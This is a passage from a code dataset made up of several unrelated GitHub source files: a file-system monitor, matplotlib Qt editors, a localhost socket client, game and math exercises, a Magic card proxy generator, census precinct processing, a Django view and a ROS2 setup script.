monitorEvents(FileSystemEventHandler):\n #global variables needed within the class.\n global sendSMTP\n global logFile\n global fileName\n\n #Check the parameter arguemtns.\n def logger(self):\n #Check to see if logging to file is enabled or not and if so adds the file path and name to filename= within the logging.\n if (logFile == \"True\"):\n logging.basicConfig(level=logging.DEBUG,filename=fileName,format=\"%(asctime)s : %(message)s\")\n print(\"logging to file.\")\n else:\n print(\"Not logging to file.\")\n\n #Check to see if logging to email is enabled or not.\n if(sendSMTP != \"True\"):\n print(\"Not logging to email.\")\n else:\n print(\"Logging to email.\")\n\n def catch_all_handler(self, event):\n #Log to the the log file.\n if (logFile == \"True\"):\n logging.debug(event)\n \n def on_moved(self, event):\n self.catch_all_handler(event)\n \n def on_created(self, event):\n self.catch_all_handler(event)\n \n def on_deleted(self, event):\n #self.catch_all_handler(event)\n #Prints on screen.\n print(event)\n \n #Log to the the log file.\n if (logFile == \"True\"):\n logging.debug(event)\n \n #Sends email if argument is true.\n if(sendSMTP == \"True\"):\n #Send email.\n sendsmtp(event)\n \n def on_modified(self, event):\n self.catch_all_handler(event)\n\n#Start the monitoring process.\ndef monitor(path):\n #Stores the class.\n monitor_events = monitorEvents()\n #Runs the logger function for checking to see if logging to file is enabled.\n monitor_events.logger()\n \n observer = Observer()\n observer.schedule(monitor_events, path, recursive=True)\n observer.start() \n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n observer.join()\n\n#Main program.\ndef main():\n #global variables needed within the function.\n global sendSMTP\n global logFile\n global fileName\n \n #Check if there is four arguments written in by the user.\n #The first argument is the name of the python script.\n #The second argument is the directory in which is being listened.\n #The third argument is if you want to send an email true/false.\n #The fourth argument is log to a file true/false.\n #The fith argument is the file name.\n if (len(sys.argv) == 5 and sys.argv[2] == \"true\" or sys.argv[2] == \"false\" and sys.argv[3] == \"true\" or sys.argv[3] == \"false\" and sys.argv[4] != None):\n #Splits and stores the arguements into strings.\n path = sys.argv[1]\n SMTP = sys.argv[2]\n log = sys.argv[3]\n fileName = sys.argv[4]\n \n #Check if its sending email is true or false.\n if(SMTP.upper() == \"TRUE\"):\n sendSMTP = \"True\"\n else: \n sendSMTP = \"False\"\n \n #Check if the program is logging to a file.\n if (log.upper() == \"TRUE\"):\n logFile = \"True\"\n else:\n logFile = \"False\"\n \n #Monitor the path given in the argument.\n monitor(path) \n else:\n #Print an error if it doe not match the format.\n print(sys.stderr, \"Argument error. Usage: SMTPSending:true/false> \")\n\n#Starts the program.\nmain()\n\n\n\n\n'''\nExample of the program running;\n\nC:\\Python27>PathMonitor.py C:\\ true true file\nlogging to file.\nLogging to email.\n\n\n\n\n\n\n\nExample of file created.\n\n2018-02-28 14:18:06,979 : \n2018-02-28 14:18:09,986 : \n2018-02-28 14:18:10,513 : \n\n\n\nExample of email\n\n\n\n---\nThis email has been checked for viruses by ...\n\n\n\nExample of program failing on arguments.\n\nC:\\Python27>PathMonitor.py C:\\ false f file\n(', mode 'w' at 0x0222D0D0>, 'Argument error. Usage: SMTPSending:true/false> ')\n\n\n'''\n\n\n\n","repo_name":"jddavies89/SysOps","sub_path":"Python/PathMonitor.py","file_name":"PathMonitor.py","file_ext":"py","file_size_in_byte":5285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3651562974","text":"from pyface.qt import QtGui, QtCore\nimport matplotlib\n\nfrom traitsui.qt4.editor import Editor\nfrom traitsui.qt4.basic_editor_factory import BasicEditorFactory\nfrom traitsui.api import Handler\n\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt4 import NavigationToolbar2QT\n\n\nclass _MPLSimFigureEditor(Editor):\n scrollable = True\n\n def init(self, parent):\n self.control = self._create_canvas(parent)\n#\t\tself.set_tooltip()\n\n def update_editor(self):\n pass\n\n def _create_canvas(self, parent):\n \"\"\" Create the MPL canvas. \"\"\"\n # matplotlib commands to create a canvas\n frame = QtGui.QWidget()\n mpl_canvas = FigureCanvas(self.value)\n mpl_canvas.setParent(frame)\n#\t\tmpl_toolbar = NavigationToolbar2QT(mpl_canvas,frame)\n\n vbox = QtGui.QVBoxLayout()\n vbox.addWidget(mpl_canvas)\n#\t\tvbox.addWidget(mpl_toolbar)\n frame.setLayout(vbox)\n return frame\n\nclass MPLSimFigureEditor(BasicEditorFactory):\n klass = _MPLSimFigureEditor\n\n\nclass _MPLFigureEditor(Editor):\n scrollable = True\n\n def init(self, parent):\n self.control = self._create_canvas(parent)\n self.set_tooltip()\n\n def update_editor(self):\n pass\n\n def _create_canvas(self, parent):\n \"\"\" Create the MPL canvas. \"\"\"\n # matplotlib commands to create a canvas\n frame = QtGui.QWidget()\n mpl_canvas = FigureCanvas(self.value)\n mpl_canvas.setParent(frame)\n mpl_toolbar = NavigationToolbar2QT(mpl_canvas,frame)\n vbox = QtGui.QVBoxLayout()\n vbox.addWidget(mpl_canvas)\n vbox.addWidget(mpl_toolbar)\n frame.setLayout(vbox)\n return frame\n\nfrom matplotlib.widgets import AxesWidget\n\nclass MPLFigureEditor(BasicEditorFactory):\n klass = _MPLFigureEditor\n\n def setup_mpl_events(self):\n self.image_axeswidget = AxesWidget(self.image_axes)\n self.image_axeswidget.connect_event('motion_notify_event', self.image_on_motion)\n #self.image_axeswidget.connect_event('figure_leave_event', self.on_cursor_leave)\n #self.image_axeswidget.connect_event('figure_enter_event', self.on_cursor_enter)\n wx.EVT_RIGHT_DOWN(self.image_figure.canvas, self.on_right_down)\n\n def on_right_down(self, event):\n if self.image_popup_menu is None:\n menu = wx.Menu()\n\n def image_on_motion(self, event):\n if event.xdata is None or event.ydata is None:\n return\n\n#cid = fig.canvas.mpl_connect('button_press_event', onclick)\n\nfrom traits.etsconfig.api import ETSConfig\nETSConfig.toolkit = 'qt4'\n\nmatplotlib.rcParams['backend.qt4']='PySide'\nclass MPLInitHandler(Handler):\n \"\"\"Handler calls mpl_setup() to initialize mpl events\"\"\"\n\n def init(self, info):\n \"\"\"This method gets called after the controls have all been\n created but before they are displayed.\n \"\"\"\n info.object.mpl_setup()\n return True\n\n\nfrom matplotlib.widgets import LassoSelector\nfrom matplotlib.path import Path\n\nimport numpy as np \nclass SelectFromCollection(object):\n \"\"\"Select indices from a matplotlib collection using `LassoSelector`.\n\n Selected indices are saved in the `ind` attribute. This tool fades out the\n points that are not part of the selection (i.e., reduces their alpha\n values). If your collection has alpha < 1, this tool will permanently\n alter the alpha values.\n\n Note that this tool selects collection objects based on their *origins*\n (i.e., `offsets`).\n\n Parameters\n ----------\n ax : :class:`~matplotlib.axes.Axes`\n Axes to interact with.\n\n collection : :class:`matplotlib.collections.Collection` subclass\n Collection you want to select from.\n\n alpha_other : 0 <= float <= 1\n To highlight a selection, this tool sets all selected points to an\n alpha value of 1 and non-selec ted points to `alpha_other`.\n \"\"\"\n\n def __init__(self, ax, collection, alpha_other=0.3):\n \n\n self.canvas = ax.figure.canvas\n self.collection = collection\n self.alpha_other = alpha_other\n\n self.xys = collection.get_offsets() #works for scatter\n #self.xys = np.array(collection.get_data()).T # works for plot\n self.Npts = len(self.xys)\n\n # Ensure that we have separate colors for each object\n self.fc = collection.get_facecolors()\n if len(self.fc) == 0:\n raise ValueError('Collection must have a facecolor')\n elif len(self.fc) == 1:\n self.fc = np.tile(self.fc, (self.Npts, 1))\n\n self.lasso = LassoSelector(ax, onselect=self.onselect)\n self.ind = []\n\n def onselect(self, verts):\n path = Path(verts)\n self.ind = np.nonzero(path.contains_points(self.xys))[0]\n self.fc[:, -1] = self.alpha_other\n self.fc[self.ind, -1] = 1\n self.collection.set_facecolors(self.fc)\n self.canvas.draw_idle()\n\n def disconnect(self):\n self.lasso.disconnect_events()\n self.fc[:, -1] = 1\n self.collection.set_facecolors(self.fc)\n self.canvas.draw_idle()\n","repo_name":"limu007/scanner","sub_path":"my_editors.py","file_name":"my_editors.py","file_ext":"py","file_size_in_byte":5135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28675174740","text":"#! /usr/bin/python3\n'''\n Client - calls server, opens file, sends server data line by line.\n'''\n\n\nimport socket\n\n\ndef connect(host, port):\n\n with open('input.txt', 'rt') as infile:\n lines = infile.read().split('\\n')\n\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:\n sock.connect((host, port))\n print('Connected to %s:%s' % (host, port))\n\n for line in lines[:-1]:\n\n print('\\tSending:\\t%s' % line)\n sock.send(line.encode('utf-8'))\n\n data = sock.recv(1024)\n print('\\tReceived:\\t%s' % data.decode())\n\n print('Finished, connection closed.')\n\n\nif __name__ == '__main__':\n\n host = '127.0.0.1'\n port = 9000\n\n connect(host, port)\n","repo_name":"okimin/operatingsystemclass","sub_path":"SampleCode/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"35474698504","text":"from sys import stdin\ns = stdin.readline().rstrip()\nalpha = [-1] * 26\nfor i in range(len(s)):\n\tif alpha[ord(s[i])-97] == -1 :\n\t\talpha[ord(s[i])-97]=i\nprint(\" \".join(map(str,alpha)))\n\n#다른사람 풀이\n\n# s = input();print(*[s.find(chr(97+i)) for i in range(26)])","repo_name":"LeeJeongHwi/Algorithm","sub_path":"Algorithm/BaekJoon/입출력/10809-알파벳찾기.py","file_name":"10809-알파벳찾기.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"22521078823","text":"from defines import Config\nimport copy\n\nclass Player:\n def __init__(self, map, n, m, obs_range, init_pos, obs):\n self.n, self.m, self.obs_range = n, m, obs_range\n self.map = copy.deepcopy(map)\n self.cur_x, self.cur_y = init_pos\n self.init_heuristic_map()\n self.obs = obs\n\n def is_in_range(self, x, y):\n return x >= 0 and x < self.n and y >= 0 and y < self.m\n\n def push(self, obs_id, direction):\n x, y = direction\n for ox, oy in self.obs[obs_id]:\n nx, ny = ox + x, oy + y\n if self.map[nx][ny] in [Config.WALL, Config.OBS, Config.SEEKER, Config.HIDER]:\n return False # not pushable\n for ox, oy in self.obs[obs_id]:\n nx, ny = ox + x, oy + y\n self.map[ox][oy] = Config.VERIFIED\n self.map[nx][ny] = Config.OBS\n self.obs[obs_id] = (nx, ny)\n return True\n\n def is_pregame(self, turn):\n return turn < Config.PREGAME_TURN\n\n def is_observable(self, i, j):\n x, y = self.cur_x, self.cur_y\n if x == i and y == j:\n return True\n if not(abs(i - x) <= self.obs_range and abs(j - y) <= self.obs_range):\n return False\n if (abs(i - x) + abs(j - y) < 2):\n return True\n if (i == x):\n return self.observe_horizontal(id, i, j)\n if (j == y):\n return self.observe_vertical(id, i, j)\n if (abs(x - i) == abs(y - j)):\n return self.observe_diagonal(id, i, j)\n if (abs(i - x) + abs(j - y) == 3):\n return self.observe_second_layer(i, j)\n return self.observe_odd_cases(id, i, j)\n\n def observe_second_layer(self, i, j):\n x, y = self.cur_x, self.cur_y\n if abs(x - i) == 2:\n tx = (x + i) // 2\n return not (self.map[tx][j] in [Config.WALL, Config.OBS])\n else:\n ty = (y + j) // 2\n return not (self.map[i][ty] in [Config.WALL, Config.OBS])\n\n def observe_horizontal(self, id, i, j):\n x, y = self.cur_x, self.cur_y\n for k in range(min(y, j), max(y, j)):\n if self.map[x][k] in [Config.WALL, Config.OBS]:\n return False\n return True\n\n def observe_vertical(self, id, i, j):\n x, y = self.cur_x, self.cur_y\n for k in range(min(x, i), max(x, i)):\n if self.map[k][y] in [Config.WALL, Config.OBS]:\n return False\n return True\n\n def observe_diagonal(self, id, i, j):\n x, y = self.cur_x, self.cur_y\n for k in range(min(i, x) + 1, max(i, x)):\n if (x - i) * (y - j) > 0:\n if self.map[k][min(j, y) + k - min(x, i)] in [Config.WALL, Config.OBS]:\n return False\n else:\n if self.map[k][max(j, y) + min(x, i) - k] in [Config.WALL, Config.OBS]:\n return False\n return True\n\n def observe_odd_cases(self, id, i, j):\n x, y = self.cur_x, self.cur_y\n if abs(x - i) == 3:\n if self.map[x-1*(x-i)//abs(x-i)][j+(y-j)//abs(y-j)] in [Config.WALL, Config.OBS] or \\\n self.map[x-2*(x-i)//abs(x-i)][y-(y-j)//abs(y-j)] in [Config.WALL, Config.OBS]:\n return False\n else:\n if self.map[i+(x-i)//abs(x-i)][y-1*(y-j)//abs(y-j)] in [Config.WALL, Config.OBS] or \\\n self.map[x-(x-i)//abs(x-i)][y-2*(y-j)//abs(y-j)] in [Config.WALL, Config.OBS]:\n return False\n return True\n\n def init_heuristic_map(self):\n self.hmap = [[0] * self.m for _ in range(self.n)]\n for i in range(self.n):\n for j in range(self.m):\n if self.map[i][j] in [Config.EMPTY]:\n self.hmap[i][j] = self.__count_nonempty_adj(i, j)\n\n def __count_nonempty_adj(self, i, j):\n cnt = 0\n for direction in Config.DIR:\n x, y = i + direction[0], j + direction[1]\n if x < 0 or x >= self.n or y < 0 or y >= self.m:\n continue\n cnt += int(self.map[x][y] in [Config.WALL, Config.OBS])\n return cnt","repo_name":"tlphat/CS420-Project-1-Hide-and-Seek","sub_path":"level4/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":4099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"40664216816","text":"import math\r\na=float(input(\"Primul nr\"))\r\nb=float(input(\"Al doilea nr\"))\r\nc=float(input(\"Al 3 nr\"))\r\n\r\ndelta=float\r\nx1=float\r\nx2=float\r\n\r\ndelta=(b**2)-(4*a*c)\r\nif delta>0:\r\n delta=math.sqrt(delta)\r\n x1=(-b+delta)/2*a\r\n x2=(-b-delta)/2*a\r\n\r\n print(\"X1 este:\",x1)\r\n print(\"X2 este:\",x2)\r\nelse:\r\n print(\"unsolvable\")\r\n\r\n","repo_name":"Bogdan119/M.A.P","sub_path":"lab1/16.py","file_name":"16.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"32994491604","text":"#coding: utf-8\n\nimport sys\nimport math\n\ndef yearRate2DayRate(yearRate, day_of_year = 360):\n #base = xx\n #base * (1 + yearRate) = base * (1 + dayRate)^n\n dayRate = math.pow(1 + yearRate, 1.0 / day_of_year) - 1\n return dayRate\n\ndef calcTotalByDays(base, yearRate, days):\n dayRate = yearRate2DayRate(yearRate)\n total = base * math.pow(1 + dayRate, days)\n return total\n\ndef yearRate2MonthRate(yearRate):\n #base = xx\n #base * (1 + yearRate) = base * (1 + monthRate)^12\n monthRate = math.pow(1 + yearRate, 1.0 / 12) - 1\n return monthRate\n\ndef calcTotalByMonths(base, yearRate, months):\n monthRate = yearRate2MonthRate(yearRate)\n total = base * math.pow(1 + monthRate, months)\n return total\n\ndef calcTotalByFreqInput(inputBase, freqDays = 30, yearRate = 0.04, days = 360):\n daysLeft = days\n totalBase = 0\n total = 0\n while (daysLeft > 0):\n totalBase += inputBase\n total += calcTotalByDays(inputBase, yearRate, daysLeft)\n daysLeft -= freqDays\n return totalBase,total,total-totalBase\n\ndef calcTotalByFreqInput_Month(inputBase, freqMonth = 1, yearRate = 0.04, months = 12):\n monthsLeft = months\n totalBase = 0\n total = 0\n while (monthsLeft > 0):\n totalBase += inputBase\n total += calcTotalByMonths(inputBase, yearRate, monthsLeft)\n monthsLeft -= freqMonth\n return totalBase, total, total-totalBase\n\ndef calcTotalByFreqInput_Years(inputBase, freq = 1.0 / 12, yearRate = 0.04, years = 1):\n yearsLeft = years \n totalBase = 0\n total = 0\n while (yearsLeft > 0):\n totalBase += inputBase\n total += inputBase * math.pow(1 + yearRate, yearsLeft)\n yearsLeft -= freq\n return totalBase, total, total-totalBase\n\nif __name__ == '__main__':\n print(yearRate2DayRate(0.04))\n print(calcTotalByFreqInput(5000, yearRate = 0.04, days = 360))\n print(calcTotalByFreqInput(5000, yearRate = 0.04, days = 3600))\n\n print(yearRate2MonthRate(0.04))\n print(calcTotalByFreqInput_Month(5000, yearRate = 0.04, months = 12))\n print(calcTotalByFreqInput_Month(5000, yearRate = 0.04, months = 120))\n\n print(calcTotalByFreqInput_Years(5000, yearRate = 0.04, years = 1))\n print(calcTotalByFreqInput_Years(5000, yearRate = 0.04, years = 10))\n\n","repo_name":"random634/LifeTrifling","sub_path":"CalcMoney.py","file_name":"CalcMoney.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"23889137409","text":"import json\nimport re\n\n\ndef get_county_id(record):\n return record[29:32]\n\n\ndef get_record_num(record):\n return record[18:25]\n\n\ndef read_precincts():\n with open('precincts.json') as f:\n precincts = json.load(f)\n\n ids = set()\n\n for precinct in precincts['features']:\n ids.add(precinct['properties']['name'])\n\n return ids\n\n\ndef get_pop_data(record_nums):\n pop_file = 'pop_data/al1.pl'\n record_to_pop = {}\n\n with open(pop_file) as f:\n for line in f:\n fields = line.split(',')\n record_num = fields[4]\n\n if record_num in record_nums:\n pop = {\n 'population': int(fields[5]),\n 'white': int(fields[7]),\n 'black': int(fields[8]),\n 'native_american': int(fields[9]),\n 'asian': int(fields[10]),\n 'pacific_islander': int(fields[11]),\n 'other': int(fields[12]),\n 'hispanic': int(fields[77])\n }\n\n record_to_pop[record_num] = pop\n\n return record_to_pop\n\n\ndef get_records():\n headers_file = 'pop_data/al_headers.pl'\n prec_to_record = {}\n prec_to_pop = {}\n\n record_nums = set()\n\n with open(headers_file) as f:\n for line in f:\n if 'AL700' in line:\n prec_id = line[226:316].strip()\n county_id = get_county_id(line)\n record_num = get_record_num(line)\n\n prec_to_record[(county_id, prec_id)] = record_num\n record_nums.add(record_num)\n\n record_to_pop = get_pop_data(record_nums)\n\n for prec in prec_to_record:\n prec_to_pop[prec] = record_to_pop[prec_to_record[prec]]\n\n return prec_to_pop\n\n\ndef main():\n prec_to_pop = get_records()\n precinct_input_file = 'al_precincts_input.json'\n\n with open(precinct_input_file) as f:\n precincts = json.load(f)\n\n for precinct in precincts['features']:\n county_id = precinct['properties']['county']\n prec_id = precinct['properties']['name']\n print(prec_id)\n\n pop = prec_to_pop[(county_id, prec_id)]\n props = precinct['properties'] | pop\n precinct['properties'] = props\n\n precinct_output_file = 'al_precincts_output.json'\n\n with open(precinct_output_file, 'w') as f:\n json.dump(precincts, f)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wongislandd/GerrymanderingWebApp","sub_path":"Scripts/PreprocessNC/getTotalPop.py","file_name":"getTotalPop.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"33"} +{"seq_id":"3907790604","text":"# coding : utf-8\nimport os\nimport re\nimport shutil\nfrom urllib.request import urlopen, urlretrieve\nfrom urllib.parse import quote_plus\nimport param\nfrom log import logger as log\n\n\nINPUT_REGEX = \"^(?:SB\\s?\\:*\\s?)?(\\d+)\\s+(?:\\[(.{2}.?)\\])?\\s?([\\w,'\\-\\s\\(\\)\\./]*?)(?:\\s*#+.*)?$\"\nONLINE_REGEX = \"(http://magiccards\\.info/scans/en/\\w{2,3}/\\d{1,3}\\w?\\.jpg)\"\nLAND_VERSION_REGEX = '\\s?\\(v\\.?\\s?([0-9]*)\\)'\n\nLAND_NAMES = ['plains', 'island', 'swamp', 'mountain', 'forest']\n\ncurrent_proxy_id = 1\n\n\ndef copy_card(path, quantity):\n global current_proxy_id\n for i in range(0, int(quantity)):\n shutil.copy(path, os.path.join(param.OUTPUT_PROXY_DIR, str(current_proxy_id) + \".jpg\"))\n current_proxy_id += 1\n\n\ndef adapt_regex_if_land(regex, card_name):\n reg = re.compile(LAND_VERSION_REGEX, re.IGNORECASE)\n if reg.search(card_name):\n land_version = reg.findall(card_name)[0]\n name = reg.sub('', card_name)\n regex = re.escape(name) + '\\s?\\(v\\.\\s?' + land_version + '\\)'\n elif card_name in LAND_NAMES: # TODO: make land card variation optional\n regex += '\\s?\\(v\\.\\s?1\\)'\n return regex\n\n\ndef find_card_offline(name, cardset=None):\n regex = name.lower()\n regex = adapt_regex_if_land(regex, name) + '(?! )\\.' # not followed by a space, but followed by a dot\n for edition_trigram in param.EDITION_TRIGRAMS:\n try:\n edition_scan_path = os.path.join(param.SCANS_DIR, edition_trigram)\n reg = re.compile(regex, re.IGNORECASE)\n for filename in os.listdir(edition_scan_path):\n if reg.match(filename):\n edition_file_path = os.path.join(edition_scan_path, filename)\n if os.path.getsize(edition_file_path) > 0:\n found = edition_file_path\n if not cardset or os.path.basename(edition_scan_path) == cardset:\n return found\n except IOError:\n continue\n\n\ndef is_double_faced_card(cardname):\n return True if cardname.lower() in param.CARDS_DOUBLE_FACED.keys() else False\n\n\ndef create_proxy_offline(quantity, cardname, cardset=''):\n cardname_splitted = cardname.split('//')[0].rstrip().lower()\n if is_double_faced_card(cardname_splitted):\n if not create_proxy_offline(quantity, param.CARDS_DOUBLE_FACED[cardname_splitted], cardset):\n log.error(\"'{}' not found in scans directory \".format(cardname_splitted))\n return_code = 0\n else:\n filepath = find_card_offline(cardname_splitted, cardset)\n copy_card(filepath, quantity)\n log.info(\"{} '{}' created using file {}\".format(quantity, cardname_splitted, filepath))\n return_code = 1\n else:\n cardname_replaced = re.sub(\"\\s*/{1,2}\\s*\", \"_\", cardname)\n filepath = find_card_offline(cardname_replaced, cardset)\n if filepath:\n copy_card(filepath, quantity)\n log.info(\"{} '{}' created using file {}\".format(quantity, cardname_replaced, filepath))\n return_code = 1\n else:\n log.error(\"'{}' not found in scans directory \".format(cardname_replaced))\n return_code = 0\n return return_code\n\n\ndef create_proxy_online(quantity, cardname, cardset=''):\n global current_proxy_id\n if cardset == '':\n searchurl = \"http://magiccards.info/query?q=!{}&v=card&s=cname\".format(\n quote_plus(cardname.lower()))\n else:\n searchurl = \"http://magiccards.info/query?q={}+e%3A{}&v=card&s=cname\".format(\n quote_plus(cardname.lower()),\n quote_plus(cardset.lower()))\n with urlopen(searchurl) as response:\n httpcontent = response.readlines()\n if re.search(ONLINE_REGEX, str(httpcontent)):\n imageurl = re.findall(ONLINE_REGEX, str(httpcontent))[0]\n tmpfile = urlretrieve(imageurl)[0]\n copy_card(tmpfile, quantity)\n log.info(\"{} '{}' created using {}\".format(quantity, cardname, imageurl))\n return 1\n else:\n log.error(\"'\" + cardname + \"' not found online with URL \" + searchurl)\n return 0\n\n\ndef card_not_found(name):\n with open(param.NOT_FOUND_FILE, 'a') as fd:\n fd.write(name)\n\n\ndef process_input_file(input_file):\n with open(input_file, 'r', encoding='utf8') as fd:\n lines = fd.readlines()\n compiled_regex = re.compile(INPUT_REGEX, re.M | re.I)\n for line in lines:\n if compiled_regex.match(line) is not None:\n quantity, cardset, cardname = map(lambda x: x.strip(), compiled_regex.findall(line)[0])\n log.debug(\"quantity : \" + cardname)\n log.debug(\"quantity : \" + quantity)\n log.debug(\"cardset : \" + cardset)\n if not cardset:\n log.info(\"Searching for '{}' in the most recent edition\".format(cardname))\n else:\n log.info(\"Searching for '{}' in [{}] edition\".format(cardname, cardset))\n if param.MODE_PRIORITY.lower() == 'offline':\n if not create_proxy_offline(quantity, cardname, cardset):\n if param.TRY_OTHER_METHOD and not create_proxy_online(quantity, cardname, cardset):\n card_not_found(line)\n else:\n card_not_found(line)\n else:\n if not create_proxy_online(quantity, cardname, cardset):\n if param.TRY_OTHER_METHOD and not create_proxy_offline(quantity, cardname, cardset):\n card_not_found(line)\n else:\n card_not_found(line)\n\n\ndef delete_older_work():\n os.makedirs(param.OUTPUT_DIR, exist_ok=True)\n for root, dirs, files in os.walk(param.OUTPUT_DIR, topdown=False):\n for name in files:\n os.remove(os.path.join(root, name))\n for name in dirs:\n os.rmdir(os.path.join(root, name))\n os.makedirs(param.OUTPUT_PROXY_DIR)\n log.debug(os.path.join(param.OUTPUT_DIR, param.OUTPUT_FILE_NAME))\n if param.OUTPUT_FILE_EXTENSION == '.sla':\n sla_filename = os.path.join(param.CONF_DIR, \"Proxy.sla\")\n shutil.copy(sla_filename, os.path.join(param.OUTPUT_DIR, param.OUTPUT_FILE_NAME))\n open(param.NOT_FOUND_FILE, 'w').close()\n\n\nif __name__ == '__main__':\n delete_older_work()\n process_input_file(param.PROXY_FILE)\n if param.OUTPUT_TYPE == 'pdf':\n import pdf\n pdf.print_pdf(current_proxy_id - 1, os.path.join(param.OUTPUT_DIR, param.OUTPUT_FILE_NAME))\n","repo_name":"Abraxas27/MTGProxy","sub_path":"MTGProxy/MTGProxy.py","file_name":"MTGProxy.py","file_ext":"py","file_size_in_byte":6494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"25864382883","text":"class PuzzleClass:\n def __init__(self, game_board, table):\n # region -> 공통 변수 & 상수]\n self.labels = dict()\n self.label = 10 # 현재 퍼즐 조각 번호\n self.label_count = 0 # 퍼즐 조각 갯수\n\n self.BACKGROUND_NUM = 0 # 배경 상수\n self.LEN_MATRIX = len(game_board)\n # endregion\n\n # region -> game_board 관련 변수\n self.game_board = self.get_reverse_matrix(game_board)\n self.labels_gb = dict()\n\n self.label_gb = 10\n self.label_count_gb = 0\n # endregion\n\n # region -> table 관련 변수\n self.table = table\n\n self.label_gb = 10\n self.label_count_gb = 0\n # endregion\n\n def get_reverse_matrix(self, matrix):\n for row in range(self.LEN_MATRIX):\n for col in range(self.LEN_MATRIX):\n if matrix[row][col] == 1:\n matrix[row][col] = 0\n else:\n matrix[row][col] = 1\n return matrix\n\n def get_labeled_matrix(self, matrix):\n \"\"\"\n 전체 matrix에 대해 라벨링된 매트릭스를 리턴받음\n :param matrix:\n :return:\n \"\"\"\n\n self.labels = dict()\n for row in range(self.LEN_MATRIX):\n for col in range(self.LEN_MATRIX):\n if matrix[row][col] == 1:\n self.label += 1\n self.labels[self.label] = 0\n self.get_labeled_matrix_pixel(matrix, row, col)\n\n return matrix\n\n def get_labeled_matrix_pixel(self, matrix, row, col):\n \"\"\"\n 특정 row와 col 기준 라벨링된 매트릭스를 리턴받음\n :param matrix:\n :return:\n \"\"\"\n\n if (0 <= row < self.LEN_MATRIX and\n 0 <= col < self.LEN_MATRIX):\n\n if matrix[row][col] == 1:\n matrix[row][col] = self.label\n self.labels[self.label] += 1\n\n self.get_labeled_matrix_pixel(matrix, row - 1, col)\n self.get_labeled_matrix_pixel(matrix, row + 1, col)\n self.get_labeled_matrix_pixel(matrix, row, col - 1)\n self.get_labeled_matrix_pixel(matrix, row, col + 1)\n\n return matrix\n\n\ngame_board, table = [[1, 1, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 0],\n [0, 1, 1, 0, 0, 1],\n [1, 1, 0, 1, 1, 1],\n [1, 0, 0, 0, 1, 0],\n [0, 1, 1, 1, 0, 0]], \\\n [[1, 0, 0, 1, 1, 0],\n [1, 0, 1, 0, 1, 0],\n [0, 1, 1, 0, 1, 1],\n [0, 0, 1, 0, 0, 0],\n [1, 1, 0, 1, 1, 0],\n [0, 1, 0, 0, 0, 0]]\n\npuzzle_class = PuzzleClass(game_board, table)\npuzzle_class.game_board = puzzle_class.get_labeled_matrix(puzzle_class.game_board)\n\nfor row in puzzle_class.game_board:\n print(row)\n# print(puzzle_class.table)\n","repo_name":"KIMSEULBEEN/problem-solving","sub_path":"Programmers/그래프/퍼즐_조각_채우기.py","file_name":"퍼즐_조각_채우기.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"35132186182","text":"import email\nfrom django.shortcuts import render\n\nfrom .models import Inicio, Sobre, Servicos, Portfolio, Depoimentos, Contato, FormContato\n\n# Create your views here.\n\n\ndef index(request):\n\n inicio = Inicio.objects.last()\n sobre = Sobre.objects.first()\n servicos = Servicos.objects.all()[:3]\n portfolio = Portfolio.objects.all()[:4]\n depoimentos = Depoimentos.objects.all()[:3]\n contato = Contato.objects.last()\n formcontato = FormContato.objects.last()\n\n context = {\n 'inicio': inicio,\n 'sobre': sobre,\n 'servicos': servicos,\n 'portfolio': portfolio,\n 'depoimentos': depoimentos,\n 'contato': contato,\n 'formcontato': formcontato\n }\n\n if request.method == 'POST':\n nome_form = request.POST['nome']\n telefone_form = request.POST['telefone']\n email_form = request.POST['email']\n texto_form = request.POST['mensagem']\n\n form = FormContato(nome=nome_form, telefone=telefone_form,\n email=email_form, mensagem=texto_form)\n form.save()\n\n return render(request, 'index.html', context)\n","repo_name":"jpspaiva/dissemina_back","sub_path":"site_institucional/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"15888407596","text":"from setuptools import setup\n\npackage_name = 'my_py_pkg'\n\nsetup(\n name=package_name,\n version='0.0.0',\n packages=[package_name],\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='us-robot',\n maintainer_email='us-robot@todo.todo',\n description='TODO: Package description',\n license='TODO: License declaration',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n \"imu_node = my_py_pkg.imu_sensor:main\",\n \"controller_node = my_py_pkg.robot_controller:main\",\n \"wheels_node = my_py_pkg.wheels_controller:main\"\n ],\n 